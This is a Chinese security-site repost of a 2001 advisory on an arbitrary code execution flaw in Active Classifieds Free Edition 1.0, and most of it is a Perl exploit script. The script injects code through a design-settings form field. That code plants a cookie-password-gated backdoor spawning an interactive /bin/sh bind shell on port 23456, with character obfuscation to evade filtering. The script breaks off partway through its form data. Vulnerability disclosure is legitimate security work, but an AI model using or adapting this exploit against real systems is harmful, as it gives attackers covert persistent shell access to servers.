首页 > > 服务器技术 > 安全防护 >

Active Classifieds任意代码执行漏洞

2008-04-09 04:31:20来源:互联网 阅读 ()

新老客户大回馈,云服务器低至5折

Active Classifieds任意代码执行漏洞

发布日期:2001-06-28
更新日期:2001-07-03

受影响系统:

Active Web Suite Technologies Active Classifieds Free Edition 1.0
描述:

BUGTRAQ ID: 2942
CVE(CAN) ID: CAN-2001-1290

Active Classifieds是一个在线分类广告列表和管理系统。

它的免费版本存在一个原始验证漏洞,允许远程用户未经认证而执行管理命令。因此,
攻击者可能在运行这个软件的主机上执行任意代码。

<*来源:Igor Dobrovitski (noident@my-deja.com)*>


测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


Igor Dobrovitski (noident@my-deja.com)提供了如下测试代码:

#!/usr/bin/perl -w
# exploit by Igor Dobrovitski noident@my-deja.com
# This exploit will spawn an interactive shell on port 23456
# A configuration file that is added to the admin.cgi at runtime through
'require' statement
# can be ovewritten. We can write to that file, but can't read it, so we
simply restore
# the default settings. If the administrator made changes to the file
# 'websites/default/variables/design.pl', those changes will be lost and
defaults restored.
# Our shell code is also written to that file, but will only be executed if
the password
# cookie is supplied. Whoever else invokes the script won't trigger the
shell.
# Enjoy
use Socket;
$| = 1;
############################################################################
########################
$password = 'noident'; # Our cookie password, change it if you want, don't
set to empty string
# Some metacharacters, like quotes and '&' are filtered so the code looks
a bit weird
$exec_code = 'use Socket;$shell = (chr 47) . bin . (chr 47) . sh . (chr 32)
. (chr 45) . (chr 105);socket(SOCK, PF_INET, SOCK_STREAM,
6);setsockopt(SOCK, SOL_SOCKET, SO_REUSEADDR, 1);$port=23456;bind(SOCK,
sockaddr_in($port, INADDR_ANY));listen(SOCK, 1);accept (NEW,
SOCK);if(!fork()){open STDIN, (chr 60) . (chr 38) . NEW; open STDOUT, (chr
62) . (chr 38) . NEW;open STDERR, (chr 62) . (chr 38) . NEW;exec
$shell}else{close NEW;exit;}';
############################################################################
########################
unless(defined $ARGV[0]) {die "Usage: $0
www.example.com/cgi-bin/blah/classifieds/admin.cgi\n"}
$ARGV[0] =~ s|^(?:http://)*||;
($host, $scriptpath) = $ARGV[0] =~ m|^(.*?)(/.*)$|;
my $form = makeform({
'request' => 'submit_edit_design_variables',
'bgcolor' => '#FFFFFF',
'text' => '#000000',
'link' => 'navy',
'vlink' => '#aaaaaa',
'alink' => '#FFCC00',
'marginheight' => '0',
'marginwidth' => '0',
'topmargin' => '0',
'leftmargin' => '0',
'background' => '',

'table_width' => "600';\nif(\$ENV{HTTP_COOKIE} eq
\'$password\'){$exec_code}\n\$blah = '",
'header_row_color' => '#666666',
'mouse_over_color' => '#DDDDDD',
'line_color' => '#C0C0C0',
'alternate_row_color' => '#EEEEEE',

'inverse_font_color' => '#FFFFFF',
'alternate_font_color' => '#666666',
'font_face' => 'arial, helvetica',
'small_font_size' => '1',
'standard_font_size' => '2',
'large_font_size' => '3',

'max_records_per_page' => '20',
'allow_show_all' => 'yes',
'display_ad_count' => 'yes',
'display_icons' => 'yes',
'display_ad_totals' => 'yes',
'display_ad_postdate' => 'yes',
'display_location' => 'yes',

'date_format' => '3',

'months' =>
'January\nFebruary\nMarch\nApril\nMay\nJune\nJuly\nAugust\nSeptember\nOctobe
r\nNovember\nDecember',
'shortmonths' =>
'Jan\nFeb\nMar\nApr\nMay\nJun\nJul\nAug\nSept\nOct\nNov\nDec',
'weekdays' =>
'Sunday\nMonday\nTuesday\nWednesday\nThursday\nFriday\nSaturday',
'years' => '2000\n2001\n2002\n2003\n2004',
'states' =>
'Alabama\nAlaska\nArizona\nArkansas\nCalifornia\nColorado\nConnecticut\nDist
rict of
Columbia\nDelaware\nFlorida\nGeorgia\nGuam\nHawaii\nIdaho\nIllinois\nIndiana
\nIowa\nKansas\nKentucky\nLouisiana\nMaine\nMaryland\nMassachusetts\nMichiga
n\nMinnesota\nMississippi\nMissouri\nMontana\nNebraska\nNevada\nNew
Hampshire\nNew Jersey\nNew Mexico\nNew York\nNorth Carolina\nNorth
Dakota\nOhio\nOklahoma\nOregon\nPennsylvania\nPuerto Rico\nRhode
Island\nSouth Carolina\nSouth
Dakota\nTennessee\nTexas\nUtah\nVermont\nVirginia\nWashington\nWest
Virginia\nWisconsin\nWyoming\n-------------------------\nCanada -
Alberta\nCanada - British Columbia\nCanada - Manitoba\nCanada - New

标签:

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有

上一篇:Unixware Cron命令行缓冲区溢出漏洞

下一篇:Solaris libsldap缓冲区溢出漏洞

相关文章

IDC资讯: 主机资讯 注册资讯 托管资讯 vps资讯 网站建设

网站运营: 建站经验 策划盈利 搜索优化 网站推广 免费资源

网站联盟: 联盟新闻 联盟介绍 联盟点评 网赚技巧

行业资讯: 搜索引擎 网络游戏 电子商务 广告传媒

网络编程: Asp.Net编程 Asp编程 Php编程 Xml编程 Access Mssql Mysql 其它

服务器技术: Web服务器 Ftp服务器 Mail服务器 Dns服务器 安全防护

软件技巧: 其它软件 Word Excel Powerpoint Ghost Vista QQ空间 QQ FlashGet 迅雷

网页制作: FrontPages Dreamweaver Javascript css photoshop fireworks Flash

程序设计: Java技术 C/C++ VB delphi

网络知识: 网络协议 网络安全 网络管理 组网方案 Cisco技术

操作系统: Win2000 WinXP Win2003 Mac OS Linux FreeBSD

热门词条
最新资讯
热门关注
热门标签